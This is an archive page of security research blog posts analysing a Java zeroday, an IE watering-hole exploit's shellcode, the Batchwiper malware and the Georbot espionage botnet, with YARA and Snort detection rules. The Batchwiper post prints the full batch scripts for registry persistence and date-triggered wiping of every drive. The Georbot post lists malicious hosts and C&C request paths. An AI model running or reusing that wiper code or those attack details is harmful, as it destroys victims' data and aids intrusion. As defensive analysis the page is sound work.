AlienVault R&D Labs Portal. Get the latest news from our research.
Header

New year, new Java zeroday!

January 10th, 2013 | Posted by jaime.blasco in Advisory | Attacks | Exploits - (Comments Off)

Earlier this morning @Kafeine alerted us about a new Java zeroday being exploited in the wild. With the files we were able to obtain we reproduced the exploit in a fully patched new installation of Java. As you can see below we tricked the malicious Java applet to execute the calc.exe in our lab.

 

 

The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks  tricking the permissions of certain Java classes as we saw in CVE-2012-4681 .

Right now the only way to protect your machine against this exploit is disabling the Java browser plugin. Let’s see how long does it take for Oracle to release a patch.

On the other hand we expect a Metasploit module in the upcoming days as it has been happening during the last year as well as most of the exploit kits adopting this new zeroday sooner than later.

We will keep you updated as we obtain more information.

Be safe!

Update: It seems both Blackhole and Nuclear Pack exploit kits are using this vulnerability in the wild

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, ,

Just another water hole campaign using an Internet Explorer 0day

December 29th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Malware - (Comments Off)

At the beginning of the week we started to analyze a water hole campaign that was present on the Council on Foreign Relations (CFR) portal. After studying the attack and the payload and realizing that it was likely using a zeroday exploit against Internet Explorer, we  sent the information to Microsoft Security Response Center (MSRC) that is still investigating the issue. At the same time the issue was communicated to CFR and other third parties that began to work on the issue so we decided to not release public details of this attack.

It seems other researchers didn’t think the same and went public with this (http://freebeacon.com/chinese-hackers-suspected-in-cyber-attack-on-council-on-foreign-relations/) and this led to other companies blogging about this.

Once the attack has been made public we have decided to public some useful details and information that can help companies to detect and respond against this incident.

The malicious code we found in the Council on Foreign Relations portal is a Javascript file that works as follow:

- It first sets a cookie on the victim system to check if the same machine visited the link before:

 

 

 

 

 

If it is not the first visit from that system the exploit won’t trigger:

 

 

 

 

- The next check ensure that the victim is running Internet Explorer 8:

 

 

 

 

- Since the exploit uses Flash to do the Heap Spray and build the shellcode, the code also checks that Adobe Flash is present on the browser:

 

 

 

 

 

 

- Finally, it won’t continue if the browser language is not Chinese, Chinese (Taiwan), Japanese, Korean, or Russian:

 

 

 

The vulnerability present in Internet Explore 8 seems to be a user-after-free. The exploit is able to exploit both Windows XP and Windows 7 bypassing both data execution (DEP) and address space layout randomization (ASLR) protections. The malicious code loads “ms-help:” in order to bypass ASLR on Windows 7 using the technique described here. We won’t release the piece of code that triggers the use-after-free since Microsoft is still investigating the issue and we don’t want public exploits to be released and compromise thousands of users.

If the system is running Windows 7 it will also load Java since it requires the Java libraries to be loaded in order to leverage return-oriented programming (ROP) chains to bypass protections.

 

 

 

 

In the case that Windows XP is used it doesn’t load Java since it is not required to perform the exploitation:

 

 

 

 

Once the Flash file is loaded it will perform the Heap Spray and it will build the shellcode based on the system’s language and operating system supporting the following ones:

(flash.system.Capabilities.language.toLowerCase() == “zh-cn” && this.OS_Version == “windows xp”)
(flash.system.Capabilities.language.toLowerCase() == “zh-tw” && this.OS_Version == “windows xp”)
(flash.system.Capabilities.language.toLowerCase() == “en” && this.OS_Version == “windows xp”)
(flash.system.Capabilities.language.toLowerCase() == “ja” && this.OS_Version == “windows xp”)
(flash.system.Capabilities.language.toLowerCase() == “ko” && this.OS_Version == “windows xp”)
(flash.system.Capabilities.language.toLowerCase() == “ru” && this.OS_Version == “windows xp”)
(this.OS_Version == “windows 7″ && loc6 == “default”)
(this.OS_Version == “windows 7″ && loc6 == “false”)
(this.OS_Version == “windows 7″ && loc6 == “true”)

The shellcode used is very tricky, first the javascript has downloaded a file as seen in the code:

 

 

 

Lets follow the execution of the shellcode:

Using base offset: 0×401000

40122a  LoadLibraryA(shell32)
401246  SHGetSpecialFolderPathA(buf=12ff00, C:\Documents and Settings\user1\Configuraci¾n local\Arch
vos temporales de Internet)
4012a2  GetTempPath(len=100, buf=130000) = 20
4012da  CopyFileA(C:\Documents and Settings\user1\Configuraci¾n local\Archivos temporales de Interne
\Content.IE5\index.dat, C:\DOCUME~1\user1\CONFIG~1\Temp\qwea.dat)
4012fb  CreateFileA(C:\DOCUME~1\user1\CONFIG~1\Temp\qwea.dat) = 7ac
40131b  SetFilePointer(hFile=7ac, dist=50, 0, FILE_BEGIN) = 50
40133c  ReadFile(hFile=7ac, buf=130100, numBytes=80) = 1
40134b  CloseHandle(7ac)
40150b  CreateFileA(C:\Documents and Settings\user1\Configuraci¾n local\Archivos temporales de Inter
et\Content.IE5\x☺?) = 7ac
4013a3  GetFileSize(7ac, 12fe78) = 0
4013ec  CreateFileA(C:\DOCUME~1\user1\CONFIG~1\Temp\flowertep.jpg) = 7a8
401428  ReadFile(hFile=7ac, buf=12f9f4, numBytes=400) = 1
401477   E2EB                            loop 0×401464  step: 1075000
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0×83
401469   740C                            jz 0×401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0×0
401470   7405                            jz 0×401477
401477   E2EB                            loop 0×401464  step: 1075005
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0×83
401469   740C                            jz 0×401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0×0
401470   7405                            jz 0×401477
401477   E2EB                            loop 0×401464  step: 1075010
401464   807C0FFF83                      cmp byte [edi+ecx-0x1],0×83
401469   740C                            jz 0×401477
40146b   807C0FFF00                      cmp byte [edi+ecx-0x1],0×0
401470   7405                            jz 0×401477
401477   E2EB                            loop 0×401464  step: 1075015
….
….
401466  WriteFile(h=7a8, buf=12f9f4, len=0, lpw=12fe74, lap=0) = 1
401486  CloseHandle(7ac)
401495  CloseHandle(7a8)
4014a3  LoadLibraryA(C:\DOCUME~1\user1\CONFIG~1\Temp\flowertep.jpg)
4014d8   E9C0000000                      jmp 0x40159d  step: 1075965
40159d   8B7650                          mov esi,[esi+0x50]
4015a0   8BBE0C020000                    mov edi,[esi+0x20c]
4015a6   8B9E08020000                    mov ebx,[esi+0x208]
4015ac   8B8610020000                    mov eax,[esi+0x210]
4015b2   B952000000                      mov ecx,0×52  step: 1075970
4015b7   05BC040000                      add eax,0x4bc
4015bc   94                              xchg eax,esp
4015bd   807C240340                      cmp byte [esp+0x3],0×40
4015c2   7203                            jc 0x4015c7
4015c7   33C0                            xor eax,eax  step: 1075975
4015c9   8BF0                            mov esi,eax
4015cb   8BD0                            mov edx,eax
4015cd   8B2C24                          mov ebp,[esp]
4015d0   83C404                          add esp,0×4
4015d3   C20400                          retn 0×4  step: 1075980

Basically the shellcode performs the following:

- It checks the path for the Temporary Internet Explorer Files folder

- It uses index.dat and looks for the path of the file previously downloaded (xsainfo.jpg).

- It creates the file flowertep.jpg

- It reads xsainfo.jpg and performs a XOR “0×83″ operation ignoring the bytes that contain “0×00″ or “0×083″.

- It writes the the result of the XOR operation on flowertep.jpg.

- It uses LoadLibraryA to load flowertep.jpg that contains the malicious DLL payload.

Once the payload is executed it will be implanted on the system and it will try to contact the C&C server using a binary protocol through HTTP:

 

 

 

 

 

We have released an OpenIOC file that contains some indicators of compromise that you can use to detect the attack on your systems:

 

 

 

 

We recommend to use these indicators of compromise to check the presence of the malicious payload in your system. Hopefully Microsoft will release a patch soon but once again we recommend you to:

- Maintain your system up to date

- Not use Flash, Java and other third party applications in your browser if you don’t use it.

Happy hunting!

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, ,

Batchwiper: Just Another Wiping Malware

December 17th, 2012 | Posted by jaime.blasco in APT | Attacks | Forensics | Malware - (Comments Off)

A few days ago, The Iranian CERT (Maher Center) released information about a new identified targeted malware with wiping capabilities. The piece of code is very simple and it deletes files on different drives on specific dates.

The original dropper is a self-extracting RAR file with the name GrooveMonitor.exe. Once executed it extracts the following files:

\WINDOWS\system32\SLEEP.EXE, md5: ea7ed6b50a9f7b31caeea372a327bd37

\WINDOWS\system32\jucheck.exe, md5: c4cd216112cbc5b8c046934843c579f6

\WINDOWS\system32\juboot.exe, md5: fa0b300e671f73b3b0f7f415ccbe9d41

The juboot.exe is executed. The following bat file is created and executed:

\Documents and Settings\%User%\Local Settings\Temp\1.tmp\juboot.bat

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d “%systemroot%\system32\jucheck.exe” /f

start “” /D”%systemroot%\system32\” “jucheck.exe”

As you can see the bat file uses reg.exe to create a registry key that the malware uses to maintain persistence executing the jucheck.exe file everytime the system boots.

Then jucheck.exe is executed that creates the file \Documents and Settings\Administrator\Local Settings\Temp\4.tmp\jucheck.bat:

@echo off & setlocal

sleep for 2
del “%systemroot%\system32\juboot.exe” /q /s /f
del “%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe” /q /s /f

if “%date%”==”Mon 12/10/2012″ goto yes
if “%date%”==”Tue 12/11/2012″ goto yes
if “%date%”==”Wed 12/12/2012″ goto yes

if “%date%”==”Mon 01/21/2013″ goto yes
if “%date%”==”Tue 01/22/2013″ goto yes
if “%date%”==”Wed 01/23/2013″ goto yes

if “%date%”==”Mon 05/06/2013″ goto yes
if “%date%”==”Tue 05/07/2013″ goto yes
if “%date%”==”Wed 05/08/2013″ goto yes

if “%date%”==”Mon 07/22/2013″ goto yes
if “%date%”==”Tue 07/23/2013″ goto yes
if “%date%”==”Wed 07/24/2013″ goto yes

if “%date%”==”Mon 11/11/2013″ goto yes
if “%date%”==”Tue 11/12/2013″ goto yes
if “%date%”==”Wed 11/13/2013″ goto yes

if “%date%”==”Mon 02/03/2014″ goto yes
if “%date%”==”Tue 02/04/2014″ goto yes
if “%date%”==”Wed 02/05/2014″ goto yes

if “%date%”==”Mon 05/05/2014″ goto yes
if “%date%”==”Tue 05/06/2014″ goto yes
if “%date%”==”Wed 05/07/2014″ goto yes

if “%date%”==”Mon 08/11/2014″ goto yes
if “%date%”==”Tue 08/12/2014″ goto yes
if “%date%”==”Wed 08/13/2014″ goto yes

if “%date%”==”Mon 02/02/2015″ goto yes
if “%date%”==”Tue 02/03/2015″ goto yes
if “%date%”==”Wed 02/04/2015″ goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del “d:\*.*” /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del “e:\*.*” /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del “f:\*.*” /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del “g:\*.*” /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del “h:\*.*” /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del “i:\*.*” /q /s /f
IF EXIST i:\ Chkdsk i:

del “%userprofile%\Desktop\*.*” /q /s /f
\\start calc

:no

As you can see when the bat file is executed, the juboot.exe file is deleted as well as the GrooveMonitor.exe executable that resides in the Start Menu folder. Then the bat files checks the system date and if it matches one of the predefined dates  it executes the wiping routine. This routine checks for system drives and it then deletes every file on those drives. Finally it deletes the userprofile folder.

We don’t have details about the infection vector but based on the dropper it could be deployed using USB drives, internal actors, SpearPhishing or probably as the second stage of a targeted intrusion.

We have built some OpenIOC indicators that you can access here.

 

 

 

 

 

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, ,

Georbot Botnet – A cyber espionage campaign against Georgian Government

October 31st, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Forensics | IP Reputation | Malware | News | OTX | Snort - (Comments Off)

A few days ago, CERT-Georgia published a great report describing a cyber spionage campaign. ESET wrote a great report a few months ago as well. The report said the malware was found in Georgian Governmental Agencies including ministries, parliament, banks, ngo’s. The report also says the purpose of the malware was “Collecting Sensitive, Confidential Information about Georgian and American Security Documents” and it establishes a connection with Russian Official Security Agencies.

In this blog post we will offer a brief about the infection vectors as well as the malware behavior and we will share some IOC’s and signatures to detect the presence of the malware in your systems.

Infection method

To compromise the victims, the attackers placed javascript code or iframes into websites leading to exploit code.

The compromised website includes Georgian Government servers like ema.gov.ge. Other examples are:

- ema.gov.ge

- 31.214.140.214

- 178.32.91.70

- georgiaonline.xp3.biz

- 31.31.75.63

173.212.192.83

An example of a malicious javascript is as follow:

 

 

 

 

 

The malicious javascript present in frame.js/frame.php includes code that exploits several vulnerabilities including CVE-2010-0842,   CVE-2006-3730, MS06-057 and some Java exploits.

Examples of exploit codes found:

178.32.91.70 [/] modules[/]docs[/]newexp[.]jar https://www.virustotal.com/file/9bf88bf15ffa6888ec2a3bd9e8dc6d13b650f1122ca69cface9ccf777c32e259/analysis/

178.32.91.70 [/] modules[/]docs[/]Java-2010-0842[.]jar

https://www.virustotal.com/file/7a900cc7616cfbf2ca17350c436af2490621550ded3e29325dc31149db50c63d/analysis/

 

 

 

 

 

 

 

 

Once the exploit code is executed, the payload calc.exe that contains the malware is downloaded from the remote server.

The malware uses a custom packer to evade security security products. It also uses obfuscation to hide both the configuration values and the API calls.

The malware uses byte substraction operations to hide the strings including the configuration values:

 

 

 

 

 

 

 

 

 

 

 

After deobfuscation:

 

 

 

 

 

 

 

 

 

 

 

We can use the following Yara rule to detect the obfuscated binary:

rule GeorBotBinary
{
strings:
$a = {63 72 ?? 5F 30 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C}

condition:
all of them
}

Based on the deofuscated strings we can also write a Yara rule to detect the presence of the malware in memory:

rule GeorBotMemory
{
strings:
$a = {53 4F 46 54 57 41 52 45 5C 00 4D 69 63 72 6F 73 6F 66 74 5C 00 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 00 52 75 6E 00 55 53 42 53 45 52 56}
$b = {73 79 73 74 65 6D 33 32 5C 75 73 62 73 65 72 76 2E 65 78 65}
$c = {5C 75 73 62 73 65 72 76 2E 65 78 65}
condition:
$a and ($b or $c)
}

We use both the registry key used to maintain persistence and the executable name that the malware creates on the system (in version >=5 of the malware those values are stored on wide strings).

If we have a memory image of a system we can use Volatility to look for processes matching our Yara rule:

$ python vol.py -f /Users/jaime/tmp/geor.img yarascan -y GeorBotMemory.yara
Volatile Systems Volatility Framework 2.1_alpha

Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004055b3 53 4f 46 54 57 41 52 45 5c 00 4d 69 63 72 6f 73 SOFTWARE\.Micros
0x004055c3 6f 66 74 5c 00 57 69 6e 64 6f 77 73 5c 43 75 72 oft\.Windows\Cur
0x004055d3 72 65 6e 74 56 65 72 73 69 6f 6e 5c 00 52 75 6e rentVersion\.Run
0x004055e3 00 55 53 42 53 45 52 56 00 2e 64 6f 63 00 2e 78 .USBSERV..doc..x
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059a6 73 79 73 74 65 6d 33 32 5c 75 73 62 73 65 72 76 system32\usbserv
0x004059b6 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 53 5c .exe.C:\WINDOWS\
0x004059c6 73 79 73 74 65 6d 33 32 5c 75 73 62 63 6c 69 65 system32\usbclie
0x004059d6 6e 74 2e 65 78 65 00 43 3a 5c 57 49 4e 44 4f 57 nt.exe.C:\WINDOW
Rule: GeorBotMemory
Owner: Process 833bd8e9fdf6f18 Pid 368
0x004059ae 5c 75 73 62 73 65 72 76 2e 65 78 65 00 43 3a 5c \usbserv.exe.C:\
0x004059be 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d 33 32 WINDOWS\system32
0x004059ce 5c 75 73 62 63 6c 69 65 6e 74 2e 65 78 65 00 43 \usbclient.exe.C
0x004059de 3a 5c 57 49 4e 44 4f 57 53 5c 73 79 73 74 65 6d :\WINDOWS\system

Network traffic

The malware uses HTTP to communicate with the C&C server. It contains several commands to upload and retrieve information from the victim. It also looks for malware updates every once in a while. In early versions the update version was requested from /modules/docs/upload/calc.exe on the C&C server.

 

 

 

 

 

In newer versions the malware performs a request to /calc.php and the server sends base64 encode content (it can be done using content from different servers at the same time).

 

 

 

 

 

 

 

When the malware starts it sends the following request to the C&C:

 

 

 

 

 

Every minute it sends the following HTTP request to the C&C to ask for instructions:

 

 

 

 

In newer versions the parameter “cam” was also introduced that tells the C&C whether the infected system has a webcam.

/index312.php?ver=5.1&cam=0&p=cert123&id=401acd00

You can use the following snort to detect the presence of this malware in your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot requesting update”; flow: to_server,established; content:”/modules/docs/upload/calc.exe”; http_uri; classtype:trojan-activity; sid:1111111112; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot initial checkin”; flow: to_server,established; content:”POST”; http_method; nocase; content:”.php?ver=”; http_uri; content:”&p=cert123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111113; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET MALWARE Georbot checkin”; flow: to_server,established; content:”.php?ver=”; http_uri; content:”&p=bot123″; fast_pattern; http_uri; content:”&id=”; http_uri; classtype:trojan-activity; sid:1111111114; rev:1;)

Emerging Threats Pro has coverage for previous versions (see “ETPRO TROJAN TDSS.xcn”) but the rules I posted will work with newer versions of the malware as well.

Based on the behavior of the malware we wrote this OpenIOC rule:

 

 

 

 

 

 

You can download all the content from this blog post on the following url:

https://github.com/jaimeblasco/AlienvaultLabs/tree/master/malware_analysis/Georbot

Happy Halloween!

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , , , ,

New versions of the IExplorer ZeroDay emerge targeting Defence and Industrial companies

September 19th, 2012 | Posted by jaime.blasco in APT | Attacks | Exploits | Malware | Snort - (Comments Off)

As we related in our previous blog post the latest Internet Explorer ZeroDay is being used to target specific sectors including the Defence and Industrial ones.

Following our investigations on the servers found serving the Internet Explorer Zeroday and using OSINT, we were able to use the WHOIS mail address and the ip addresses used by the attackers to find fake domains registered by them that contain specific names of companies related with:

- US Aircraft and weapons delivery systems company

- US Defence decoy countermeasures company

- US Aerospace and defence technology company

- US Supplier for repairs of tactical fighters

- Laboratory for energetic systems and materials

- UK Defence contractor

We also found a fake domain of a company that builds turbines and power sources used in several applications including utilities and power plants.

We were able to check that the official website of the company has been compromised as well and it is serving the Internet Explorer ZeroDay to the visitors. They’ve included an iframe to the exploit in the entry page:

 

 

The version of the exploit found seems to be based on the code that we found in the previous servers and also uses the Grumgog.swf Flash file to aid on the exploitation.

Apart from that, it seems the exploit code has evolved and they are now able to infect not only Windows XP but also Windows 7 32 bits running Java6. This is based on the Dodge.html file we found within the exploit code:

 

 

 

 

 

 

 

 

 

 

 

The flash file is also encrypted with DoSWF as the previous versions and licensed to bnetbgm@163.com.fr. Once the vulnerability is triggered, the malicious code downloads the payload from /_include/site.exe.

The payload is obfuscated with the same XOR 70 scheme and once again it contains a version of the PlugX RAT that we found in previous attacks.

The PlugX RAT connect to a C&C server on oXXX.blogdns.com that resolvs to 142.4.46.214. I recommend you to search your logs for connections to that ip address since it will be a symptom of a compromised system.

In the other hand, these Emerging Threats Snort rules will help you catching exploit attempts and related activity:

2015704 – ET CURRENT_EVENTS DoSWF Flash Encryption Banner
2015711 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day
2015712 – ET CURRENT_EVENTS Internet Explorer execCommand fuction Use after free Vulnerability 0day

Happy hunting!

 

jaime.blasco

At AlienVault Jaime manages the Lab and runs the Vulnerability Research Team. Prior to working in the AlienVault lab he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. His background stems from a number of years working in vulnerability management, malware analysis and security researching.

More Posts - Website

Follow Me:
TwitterLinkedIn

, , , ,